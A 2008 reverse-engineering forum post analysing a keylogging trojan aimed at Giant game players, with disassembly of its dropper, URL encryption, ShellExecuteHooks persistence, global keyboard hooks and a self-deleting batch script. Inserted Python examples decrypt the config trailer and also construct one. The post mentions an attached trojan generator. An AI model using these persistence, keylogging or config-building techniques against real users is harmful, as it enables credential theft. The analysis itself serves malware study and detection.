Hmily, posted 2008-12-5 23:14
From:jjh1260 www.unpack.cn
【Title】Analysis of a Giant (巨人) trojan & a home-written generator
【Author】JJH
【Tools】OD, DELPHI
The attachment contains a Word analysis document, the trojan sample and a generator I wrote myself.
Purely for entertainment; do not use it for illegal purposes.
Also, I don't play Giant myself, so I didn't analyse it in detail; please point out any mistakes. A friend says both the trojan and the generator work.
This trojan does not survive an in-memory scan; turn off your AV while debugging, and 安全卫士 is enough to remove it.
Contents
Packer analysis
Unpacking
EXE file analysis
1. Dropped trojan files
2. Report-back (收信) URL
3. Registry
4. Loading the DLL with LoadLibraryA, attempting to inject every process & hooks
5. Self-deletion (a self-deleting .bat in the system temp directory)
1. Packer analysis. PEiD:
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay]
Protection ID:
Scanning -> E:\bak2\巨人小马.exe
File Type : Exe, Size : 14979 (03A83h) Bytes
-> File has 3715 (0E83h) bytes of appended data starting at offset 02C00h
[!] UPX [unknown / modified] compressed !
2. Unpacking
A plain UPX compression packer: unpack by hand with the ESP trick, take a full dump with LordPE and repair the imports with ImportREC. The unpacked file is 26,243 (0x6683) bytes and is identified as Microsoft Visual C++ 6.0 [Overlay]. The [Overlay] is not incidental: the data appended after the PE image is where the encrypted report-back URL of section ⑵ lives (the last 0x94 bytes of the file), so it must be preserved when dumping.
3. EXE file analysis
⑴ Dropped trojan files
%system32%\mgxzghlc.dll (first dropped as mgxzghlc.tmp, then renamed to mgxzghlc.dll with MoveFileExA)
//the trojan DLL that gets injected; the 8-letter base name is generated randomly, which is why the listings below show different names (utjpwjnf, alxvvskd, vldncjjo): each run of the dropper yields a new one, while the .tmp, .dll and .nls files of a single run share the same base name
%system32%\mgxzghlc.nls //0x94 bytes, holds the encrypted report-back URL
① GetSystemDirectoryA stores %system32% in [local.280]
0040185C |. 8D85 A0FBFFFF lea eax,[local.280] //buffer for the system32 path
00401862 |. 56 push esi ; /BufSize => 104 (260.)
00401863 |. 50 push eax ; |Buffer
00401864 |. FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetSystemD>; \GetSystemDirectoryA
② The current time is taken as the random seed; the random numbers produce the 8-letter file name, after which the resource is dropped
00401CDE |. 6A 00 push 0 ; /timer = NULL
00401CE0 |. FF15 E8304000 call dword ptr ds:[<&MSVCRT.time>] ; \time
00401CE6 |. 50 push eax ; /seed = 49028184 (1224900996.)
00401CE7 |. FF15 E4304000 call dword ptr ds:[<&MSVCRT.srand>] ; \srand
00401CED |. 59 pop ecx
00401CEE |. 33F6 xor esi,esi
00401CF0 |. 59 pop ecx
The file-name loop follows. The name is 8 characters long and each character is computed as (rand() mod 0x1A) + 0x61.
0x61 is 'a' and 0x1A = 26, so this yields 8 random lowercase letters, used as the base name of the dropped .tmp and .dll files. (cdq/idiv is a signed division, but rand() only returns 0..32767, so the remainder left in dl is always 0..25.)
00401CF1 |> /FF15 E0304000 call dword ptr ds:[<&MSVCRT.rand>] ; [rand
00401CF7 |. |6A 1A push 1A
00401CF9 |. |99 cdq
00401CFA |. |59 pop ecx
00401CFB |. |F7F9 idiv ecx
00401CFD |. |80C2 61 add dl,61
00401D00 |. |8896 64424000 mov byte ptr ds:[esi+404264],dl
00401D06 |. |46 inc esi
00401D07 |. |83FE 08 cmp esi,8
00401D0A |.^\7C E5 jl short 巨人.00401CF1
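As a worked example added here (not part of JJH's post or of the attached generator), the following Python reproduces the name generator from the loop above. It assumes the dropper uses the ordinary MSVCRT rand(), which the MSVCRT.srand/rand imports in the listing support; the LCG constants (214013, 2531011, shift 16, mask 0x7FFF) are the Microsoft C runtime's. The seed 0x49028184 is the time() value visible in the listing; everything else is constructed for the demo.

```python
"""Reproduce the dropped-file name generator from the listing above.

Added example, not code from the original post. The dropper seeds
MSVCRT srand() with time() and builds an 8-letter name from
(rand() % 0x1A) + 0x61. The generator below is the Microsoft C runtime's
rand(): state = state*214013 + 2531011 (mod 2^32), result = (state >> 16) & 0x7FFF.
"""


class MsvcrtRand:
    """Minimal MSVCRT-compatible srand()/rand()."""

    def __init__(self, seed: int = 1) -> None:
        self.state = seed & 0xFFFFFFFF  # srand(seed); time_t is 32-bit in VC6

    def rand(self) -> int:
        self.state = (self.state * 214013 + 2531011) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF


def dropped_name(seed: int, length: int = 8) -> str:
    """The loop at 00401CF1: each byte is (rand() % 26) + ord('a')."""
    rng = MsvcrtRand(seed)
    return "".join(chr(rng.rand() % 0x1A + 0x61) for _ in range(length))


def candidate_names(t_infection: int, slack: int = 30) -> list:
    """Names for every time() value within +/- slack seconds of t_infection.

    Incident-response use: the .tmp, .dll and .nls files share one base name
    and the only entropy is the second at which the dropper ran, so a rough
    infection time (e.g. the last-write time of the ShellExecuteHooks key)
    bounds the search in %system32% to a few dozen names.
    """
    return [(t, dropped_name(t)) for t in range(t_infection - slack, t_infection + slack + 1)]


if __name__ == "__main__":
    seed = 0x49028184  # the time() value visible in the listing above (1224900996)
    print(f"seed {seed:#x} -> %system32%\\{dropped_name(seed)}.dll / .tmp / .nls")
    for t, name in candidate_names(seed, slack=2):
        print(t, name)
```

Because `srand()` is called with a whole-second `time()`, two machines infected in the same second get the same file name; conversely, a defender who knows the infection time to within a minute can enumerate every possible name instead of scanning system32 for arbitrary 8-letter DLLs.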
//Build the full path names, e.g. %system32%\utjpwjnf.dll and %system32%\utjpwjnf.tmp
00401893 |. 50 push eax ; /src
00401894 |. 8D85 A0FBFFFF lea eax,[local.280] ; |//system32 path
0040189A |. 50 push eax ; |dest
0040189B |. E8 10090000 call <jmp.&MSVCRT.strcat> ; \strcat
004018C5 |. C745 F4 2E646>mov [local.3],6C6C642E //local variable [local.3] = 6C6C642E, i.e. ".dll"
00401930 |. 8D45 EC lea eax,[local.5]
00401933 |. C745 EC 2E746>mov [local.5],706D742E //local variable [local.5] = 706D742E, i.e. ".tmp"
//Create the .tmp file in the system32 directory
00401957 |. C745 E4 44415>mov [local.7],41544144 //local variable [local.7] = 41544144, i.e. "DATA"
(the payload is dropped from a resource embedded in the EXE: ResourceType = "DATA", ResourceName = 65)
//00401770 |. FF15 60304000 call dword ptr ds:[<&KERNEL32.FindResour>; \FindResourceA
//0040177E |. FF15 5C304000 call dword ptr ds:[<&KERNEL32.LoadResour>; \LoadResource
//0040178C |. FF15 58304000 call dword ptr ds:[<&KERNEL32.LockResour>; \LockResource (OllyDbg labels this call SetHandleCount; the import actually resolved is LockResource)
//0040179B |. FF15 54304000 call dword ptr ds:[<&KERNEL32.SizeofReso>; \SizeofResource
//004017C8 |. FF15 84304000 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile (writes the resource into the .tmp file)
③ Create the .nls file
00401A6B |. 50 push eax ; /src
00401A6C |. 8D85 9CFAFFFF lea eax,[local.345] ; |
00401A72 |. 50 push eax ; |dest
00401A73 |. E8 FA060000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401A78 |. 8D45 DC lea eax,[local.9]
00401A7B |. C745 DC 2E6E6>mov [local.9], 736C6E2E // 736C6E2E即.nls
00401A82 |. 50 push eax ; /src = ".nls"
00401A83 |. 8D85 9CFAFFFF lea eax,[local.345] ; |
00401A89 |. 50 push eax ; |dest = "%system32%\alxvvskd"
00401A8A |. 895D E0 mov [local.8],ebx ; |
00401A8D |. E8 1E070000 call <jmp.&MSVCRT.strcat> ; \strcat
00401A92 |. 8D85 98F9FFFF lea eax,[local.410]
00401A98 |. 50 push eax
00401A99 |. 8D85 9CFAFFFF lea eax,[local.345]
00401A9F |. 50 push eax
00401AA0 |. E8 D9F9FFFF call 巨人.0040147E //calls CreateFileA to create the .nls file and writes into it the 0x94 bytes of encrypted URL data taken from the end of the EXE (the trailer read in section ⑵)
⑵ Report-back URL
① The key is stored at offset 0x2010 in the EXE: the DWORD 0xFFFEFDFC
② The dropper opens its own EXE and validates the appended data: it seeks to the last 4 bytes and checks that they equal 0xBD43DBFE, seeks to 8 bytes before the end and reads a DWORD (0x94, the trailer length), then seeks to 0x94 bytes before the end, which is where the encrypted .asp URL begins
00401028 |. FF15 88304000 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA
//seek to the last 4 bytes
0040103C |. 8B1D 8C304000 mov ebx,dword ptr ds:[<&KERNEL32.SetFile>; kernel32.SetFilePointer
00401042 |. 6A 02 push 2 ; /Origin = FILE_END
00401044 |. 56 push esi ; |pOffsetHi => NULL
00401045 |. 6A FC push -4 ; |OffsetLo = FFFFFFFC (-4.)
00401047 |. 57 push edi ; |hFile
00401048 |. FFD3 call ebx ; \SetFilePointer
//read the last 4 bytes and compare them with 0xBD43DBFE
0040105C |. FFD6 call esi ; \ReadFile
0040105E |. 817D F4 FEDB4>cmp [local.3],BD43DBFE
//seek to 8 bytes before the end and read the 4-byte length; in this sample it is 0x94
0040107E |. 6A 02 push 2
00401080 |. 57 push edi
00401081 |. 6A F8 push -8
00401083 |. FF75 08 push [arg.1]
00401086 |. FFD3 call ebx ; kernel32.SetFilePointer
00401096 |. FFD6 call esi ; kernel32.ReadFile
//allocate 0x94-8 = 0x8C bytes and read the 0x8C bytes of encrypted report-back URL data starting at (EOF - 0x94)
004010BA |. 50 push eax ; /size = 8C (140.)
004010BB |. FF15 BC304000 call dword ptr ds:[<&MSVCRT.malloc>] ; \malloc
004010DE |. FFD6 call esi ; kernel32.ReadFile
//URL decryption follows
Algorithm: XOR the encrypted data (0x8C bytes) byte by byte with the 4-byte key 0xFFFEFDFC, cycling through the key: ecx walks the key bytes from edi up to esi and wraps back to edi, while edx indexes the data up to [arg.2]
0040180A |> /8B45 08 /mov eax,[arg.1]
0040180D |. |8A19 |mov bl,byte ptr ds:[ecx]
0040180F |. |03C2 |add eax,edx
00401811 |. |3018 |xor byte ptr ds:[eax],bl
00401813 |. |41 |inc ecx
00401814 |. |3BCE |cmp ecx,esi
00401816 |. |72 02 |jb short 巨人.0040181A
00401818 |. |8BCF |mov ecx,edi
0040181A |> |42 |inc edx
0040181B |. |3B55 0C |cmp edx,[arg.2]
0040181E |.^\7C EA \jl short 巨人.0040180A
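As a worked example added here (not part of JJH's post), the following Python implements the trailer layout and the XOR loop described above as a stand-alone extractor, so the report-back URL can be recovered from a sample without running it. It assumes the key DWORD 0xFFFEFDFC is stored little-endian in the file, so the byte sequence the loop cycles through is FC FD FE FF; the sample image and URL it builds are constructed for the demo, not taken from the malware.

```python
"""Extract and decrypt the report-back URL appended to the dropper.

Added example, not code from the original post. Layout, as analysed
above: the last 4 bytes of the EXE are the marker 0xBD43DBFE, the 4 bytes
before it hold the trailer length (0x94 in this sample), and the
length-8 bytes before those are the URL XOR-encrypted with the 4-byte key
found at file offset 0x2010. Assumption: that DWORD (0xFFFEFDFC) is
stored little-endian, so the key bytes applied by the loop at 0040180A
are FC FD FE FF.
"""
import struct

MARKER = 0xBD43DBFE
KEY = struct.pack("<I", 0xFFFEFDFC)  # b"\xfc\xfd\xfe\xff" (assumed byte order)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR with a cycling key (the loop at 0040180A: ecx wraps back to edi)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def trailer_length(image: bytes) -> int:
    """Validate the marker and return the trailer length stored at EOF-8."""
    if len(image) < 8:
        raise ValueError("image too short for a trailer")
    (marker,) = struct.unpack_from("<I", image, len(image) - 4)
    if marker != MARKER:
        raise ValueError(f"marker mismatch: {marker:#010x}")
    (size,) = struct.unpack_from("<I", image, len(image) - 8)
    if size < 8 or size > len(image):
        raise ValueError(f"implausible trailer length {size:#x}")
    return size


def parse_trailer(image: bytes) -> bytes:
    """The encrypted payload: the dropper mallocs size-8 bytes and reads from EOF-size."""
    size = trailer_length(image)
    return image[len(image) - size : len(image) - 8]


def nls_contents(image: bytes) -> bytes:
    """What the dropper writes to %system32%\\<name>.nls: the whole trailer (0x94 bytes here)."""
    return image[len(image) - trailer_length(image) :]


def recover_url(image: bytes, key: bytes = KEY) -> str:
    """Decrypt the payload and return the NUL-terminated URL string."""
    payload = xor_repeating(parse_trailer(image), key)
    return payload.split(b"\0", 1)[0].decode("latin-1")


def build_sample(url: str, key: bytes = KEY, pe_stub: bytes = b"MZ" + b"\0" * 62) -> bytes:
    """Constructed test image: stub + XOR-encrypted URL + length DWORD + marker."""
    plain = url.encode() + b"\0"
    return pe_stub + xor_repeating(plain, key) + struct.pack("<II", len(plain) + 8, MARKER)


if __name__ == "__main__":
    # Constructed URL; the real sample's URL is not reproduced here.
    img = build_sample("http://c2.example.invalid/recv.asp")
    print(f"trailer length {trailer_length(img):#x}, url = {recover_url(img)}")
```

Run against a real sample, `recover_url(open(path, "rb").read())` gives the URL and `nls_contents()` should match the dropped .nls byte for byte; if the marker check fails the file is not this dropper variant (or was dumped without its overlay, which is exactly why the [Overlay] must survive unpacking). The same functions make a generator trivial to recognise: any file ending in 0xBD43DBFE with a plausible length DWORD before it is worth a look.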
⑶ Registry
① Register a CLSID
[HKEY_CLASSES_ROOT\CLSID\]
CLSID: {432BDC7C-DE5B-43f4-AA81-E7F8AFB0182D}
\InprocServer32
Type: REG_SZ
String: "C:\WINDOWS\system32\alxvvskd.dll"
//{432BDC7C-DE5B-43f4-AA81-E7F8AFB0182D}: the immediate bytes in the assembly below spell out this CLSID
004020FC |. C745 D4 7B343>mov [local.11],3233347B ; |
00402103 |. C745 D8 42444>mov [local.10],37434442 ; |
0040210A |. C745 DC 432D4>mov [local.9],45442D43 ; |
00402111 |. C745 E0 35422>mov [local.8],342D4235 ; |
00402118 |. C745 E4 33663>mov [local.7],2D346633 ; |
0040211F |. C745 E8 41413>mov [local.6],31384141 ; |
00402126 |. C745 EC 2D453>mov [local.5],4637452D ; |
0040212D |. C745 F0 38414>mov [local.4],42464138 ; |
00402134 |. C745 F4 30313>mov [local.3],32383130 ; |
0040213B |. C745 F8 447D0>mov [local.2],7D44
//00401B8C |. FF15 00304000 call dword ptr ds:[<&ADVAPI32.RegOpenKeyA>>; \RegOpenKeyA
//00401BB2 |. FF15 04304000 call dword ptr ds:[<&ADVAPI32.RegQueryValu>; \RegQueryValueA
//00401BEC |. FF15 0C304000 call dword ptr ds:[<&ADVAPI32.RegCloseKey>>; \RegCloseKey
② Add the trojan's CLSID under the ShellExecuteHooks key, so that explorer.exe loads the DLL automatically through the InprocServer32 entry registered above
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\
⑷ Load the DLL with LoadLibraryA, attempt to inject every process & hooks
00401C36 |. 50 push eax ; /"%system32%\alxvvskd.dll"
00401C37 |. FF15 64304000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>; \LoadLibraryA
//00401C98 |. FF55 B4 call [local.19]; alxvvskd.10002795 //this function in the DLL installs the hooks
100027AE 8B35 A4300010 mov esi,dword ptr ds:[<&USER32.SetWindowsH>; USER32.SetWindowsHookExA
100027B4 57 push edi //dwThreadId = 0: a global (system-wide) hook
100027B5 FF35 44430010 push dword ptr ds:[10004344] ; vldncjjo.10000000 (hMod = the DLL's own base)
100027BB 68 09280010 push vldncjjo.10002809 ; lpfn (hook procedure)
100027C0 6A 04 push 4 //idHook = WH_CALLWNDPROC (4): the DLL is mapped into every GUI process on the desktop
100027C2 FFD6 call esi ; USER32.SetWindowsHookExA
100027C4 57 push edi //dwThreadId = 0: global hook
100027C5 A3 4C430010 mov dword ptr ds:[1000434C],eax ; save the hook handle
100027CA FF35 44430010 push dword ptr ds:[10004344] ; vldncjjo.10000000
100027D0 68 53280010 push vldncjjo.10002853
100027D5 6A 02 push 2 //idHook = WH_KEYBOARD (2)
100027D7 FFD6 call esi ; USER32.SetWindowsHookExA
100027D9 57 push edi //dwThreadId = 0: global hook
100027DA A3 48430010 mov dword ptr ds:[10004348],eax ; save the hook handle
100027DF FF35 44430010 push dword ptr ds:[10004344] ; vldncjjo.10000000
100027E5 68 2C280010 push vldncjjo.1000282C
100027EA 6A 07 push 7 //idHook = WH_MOUSE (7)
100027EC FFD6 call esi ; USER32.SetWindowsHookExA
//Three global hooks are installed in turn: WH_CALLWNDPROC, WH_KEYBOARD and WH_MOUSE; the keyboard hook is what makes this a key-logging trojan …
⑸ Self-deletion (a self-deleting .bat in the system temp directory)
//GetTempPathA returns the TEMP directory and GetTempFileNameA a name such as 3.tmp, to which ".bat" is appended (3.tmp.bat)
//00401532 . FF15 30304000 call dword ptr ds:[<&KERNEL32.GetTempPathA>; \GetTempPathA
//0040154A . FF15 2C304000 call dword ptr ds:[<&KERNEL32.GetTempFileN>; \GetTempFileNameA
//00401553 . C745 EC 2E626>mov dword ptr ss:[ebp-14],7461622E ; .bat
//GetModuleFileNameA returns the EXE's full path, which is written into the .bat
00401575 . FF15 28304000 call dword ptr ds:[<&KERNEL32.GetModuleFil>; \GetModuleFileNameA
0040157B . 8D85 BCFEFFFF lea eax,dword ptr ss:[ebp-144]
//open the .bat for writing and write commands like the following
:t
del "E:\newupx666\巨人\巨人.exe"
if exist "E:\newupx666\巨人\巨人.exe" goto t
del
00401581 . 68 2C404000 push 巨人.0040402C ; /mode = "w"
00401586 . 50 push eax ; |path
00401587 . FF15 D4304000 call dword ptr ds:[<&MSVCRT.fopen>] ; \fopen
//WinExec runs the self-deleting .bat with SW_HIDE
00401645 . 6A 00 push 0 ; /ShowState = SW_HIDE
00401647 . 50 push eax ; ||CmdLine = "C:\DOCUME~1\jjhyou\LOCALS~1\Temp\3.tmp.bat"
00401648 . FF15 24304000 call dword ptr ds:[<&KERNEL32.WinExec>] ; \WinExec
0040164E . 6A 00 push 0 ; /ExitCode = 0
//terminate the process
00401650 . FF15 4C304000 call dword ptr ds:[<&KERNEL32.ExitProcess>>; \ExitProcess